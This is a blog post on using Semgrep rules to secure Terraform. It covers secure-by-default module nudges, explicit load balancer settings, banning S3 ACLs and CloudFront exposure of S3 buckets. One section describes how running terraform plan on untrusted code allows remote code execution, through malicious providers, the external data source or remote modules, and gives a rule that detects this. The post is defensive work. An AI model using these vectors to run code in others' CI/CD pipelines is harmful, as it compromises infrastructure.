Semgrep for Terraform Security
Apr 29, 24Semgrep for Terraform Security
I’m a bit of a Semgrep fanboy
I remember when I first tried it out in my consultant days, it was such a relief to find a SAST tool that was fast, didn’t require building the code, was extensible, and came with a solid set of default rules. It quickly replaced language specific SAST tool like bandit and nodejsscan as it subsumed their rule sets.
I’m also an Infrastructure as Code fanboy
I started using Terraform seriously in 2019, around version 0.12. My first open source project, sadcloud, used Terraform to stand up (and tear down) insecure infrastructure. Having everything managed as code has made infrastructure security more practical, especially in a startup environment.
Semgrep is good for Terraform Security
Secure-by-default modules
One approach to killing bug classes in Terraform is to replace the overly flexible default modues with custom, secure-by-default ones.
Example 1: secure-bucket
S3 bucket leaks are the most common major AWS security incident. They’re so common, I’ve given up tracking them in my repository of aws-customer-security-incidents! In addition to making the bucket private (which is now the default 😌) , there are security optimizations around Encryption, Versioning, Block Public Access, and Logging.
It’s common for companies to have a wrapper module for all this configuration, to make it easy for engineers to get a bucket deployed without dozens of lines of non-DRY configuration.
Example 2: safe-proxy-access
Most companies build up a set of internal applications. Attackers have a history of using these as a foothold. A good first step is to not have them accessible publicly - often by putting them behind an identity aware proxy. This can take a fair bit of configuration (ALB, Cognito, Okta, etc.). By bundling this as a single module, it can be offered as a pluggable service.
Use Semgrep to evangelize secure-by-default modules
Okay, so you have a whole set of great modules, but you’ll still hit a roadblock: discovery!
How is that new employee going to know to use secure-bucket
? I mean, yes it’s on page 13 of onboarding, but that was post lunch and they were a little sleepy.
Semgrep is great here! You just write a simple rule:
rules:
- id: raw-s3-resource
pattern: |
resource "aws_s3_bucket" "$X" {
...
}
languages:
- hcl
severity: WARNING
message: |
Hi! It looks like you're using a raw S3 resource.
We recommend you instead use `secure-bucket`.
Visit go/secure-bucket for details!
Then, you add that rule to your CI/CD checks, and developers will get a message on their PRs. This is a soft nudge that leaves room for deviation, while prodding people to the paved road!
Semgrep for opinonated rules
In addition to “nudges,” you can implement hard guardrails and invariants using Block mode.
This can also be used with Terraform to want to force explicit choices over use of implicit defaults. This can be helpful in highlighting critical configuration elements. For example, you want all Load Balancers to be explicitly “internal” or “external”:
rules:
- id: lb-explicit-internal-external
patterns:
- pattern: |
resource "aws_lb" "$Z" {
...
}
- pattern-not: |
resource "aws_lb" "$X" {
...
internal = $Y
...
}
languages:
- hcl
severity: ERROR
message: You must explicitly set the `internal` argument to true or false.
Or you want to ban S3 ACLs (given they’re messy, and deprecated, and gross), just do:
rules:
- id: s3-acls
pattern-either:
- pattern: |
resource "aws_s3_bucket_acl" "$Z" {
...
}
- pattern: |
resource "aws_s3_bucket" "$X" {
...
acl = "$Y"
...
}
languages:
- hcl
severity: ERROR
message: S3 ACLs are deprecated and may not be used. See go/s3-acls
Use Semgrep to secure your CI/CD
At a certain scale, you need to start applying your Terraform centrally, through an automated CI/CD system. Atlantis is the most popular open source offering. I’ve also used and enjoyed Spacelift, and of course there is always Terraform Cloud.
Applying TF via CI/CD offers improves security: developers no longer need privileged access locally, you can enforce code review, and you can run those CI/CD configuration scans!
But there is a major risk: running a terraform plan
on untrusted code can lead to remote code execution.
Some ways an attacker can execute code if they can run a plan:
- Import a malicious provider, which runs the payload on
init
- Use the
external
resource to run code directly - Or, you can do either indirectly by loading an external resource (module)
So, before running any Terraform commands, you can first use Semgrep to try (a brittle!) detection of these patterns. On any match, you could alert the security team, notify the user, or take whatever the appropriate steps are in your organization.
rules:
- id: ban-external-provider
pattern: |
data "external" "$Z" {
...
}
languages:
- hcl
severity: ERROR
message: The external provider is not allowed, as it can be used to execute code during TF plans
Of course, the same is possible (and maybe better) using OPA and conftest, but there are benefits to using Semgrep here:
- the syntax is homogeneous with your other SAST
- you can leverage the same integrations
- you can run the exact same rules at PR time and pre-Plan to provide an improved developer experience
Write custom rules, catch subtle bugs
Shoehorning this in, because I love it. A lot of the current registry rules, as with any security tools, are mostly about “CIS Benchmark” misconfigurations - think: encryption or logging disabled. But SAST really delivery a flywheel of value when you take real findings and turn them into scalable rules.
Here’s one example of a confusing footgun I’ve seen go off:
- It’s common to put Cloudfront in front of S3
- By setting up either origin access identity (OAI) or origin access control (OAC), you can limit access to the bucket to only come from Cloudfront
- If you do this with a private bucket, all the objects are now publicly accessible via Cloudfront unless you configure a signer, which then limits access to objects only to signed URLs
- This is well marked (”Restrict View Access”) in the UI. But in Terraform, it’s easy to miss that this “toxic combination” of settings makes a bucket public.
So, we can write a Semgrep rule that checks for any aws_cloudfront_distribution
that is fronting S3 (has s3_origin_config
or origin_access_control_id
) but isn’t set up to require signing (has neither trusted_signers
nor trusted_key_groups
). Here’s a messy first pass:
rules:
- id: public-s3-via-cloudfront
patterns:
- pattern-either:
- pattern: |
resource "aws_cloudfront_distribution" "$Z" {
origin {
...
s3_origin_config {
...
}
}
...
}
- pattern: |
resource "aws_cloudfront_distribution" "$Z" {
origin {
...
origin_access_control_id = $W
}
...
}
- pattern-not: |
resource "aws_cloudfront_distribution" "$X" {
...
trusted_signers = $Y
...
}
- pattern-not: |
resource "aws_cloudfront_distribution" "$X" {
...
trusted_key_groups = $Y
...
}
languages:
- hcl
severity: WARNING
message: |
This will make the S3 bucket accessible publicly via Cloudfront.
Please either set up a signer or confirm all objects are public.
This is a case where there is a possible intentional business case for doing so, but misconfiguration is subtle enough and high enough risk to provide explicit in-line guidance to developers. If you’re using a secure-bucket
pattern consistently, you could refine this rule further to detect reference to a bucket using the private bucket module.
Alternatives for Terraform Security
Alternatives for Terraform Security definitely exist. OPA and conftest were mentioned above, and checkov
is also a frequent recommendation. Semgrep is easy to get started with, but check out these references and research for a broader survey on SAST for Terraform!
References
- Gitlab - Fantastic Infrastructure as Code security attacks and how to find them
- Marco Lancini - Semgrep for Cloud Security
- Christophe Tafani-Dereeper - Shifting Cloud Security Left — Scanning Infrastructure as Code for Security Issues
- Albert Heinle - The Current State of Infrastructure as Code (IaC) from a Security Standpoint
- Frans van Buul - Everything-as-Code: Pushing the boundaries of SAST
- Serhii Vasylenko — A Deep Dive Into Terraform Static Code Analysis Tools: Features and Comparisons
Research on SAST for Infrastructure as Code
Jan 2022: A Large-Scale Study on the Security Vulnerabilities of Cloud Deployments
- Ran tfsec, terrascan and checkov against 8256 public repositories containing AWS TF, resulting in 292538 security violations
- The most common issues found are Encryption, Access control, and Insecure defaults
Aug 2023: Exploring Security Practices in Infrastructure as Code: An Empirical Study
- Ran checkov against 800 recently active projects that contain some Terraform code
- “Our findings indicate that IaC configuration poses a major risk and confirm that, despite the availability of security scanning tools, there is a lack of adoption of best practices in open-source projects”
Nov 2023: Security Vulnerabilities in Infrastructure as Code: What, How Many, and Who?
- Ran Snyk and Horusec against the source code of 7 IaC tools and that of over 1,600 Infrastructure as Code scripts and add-ons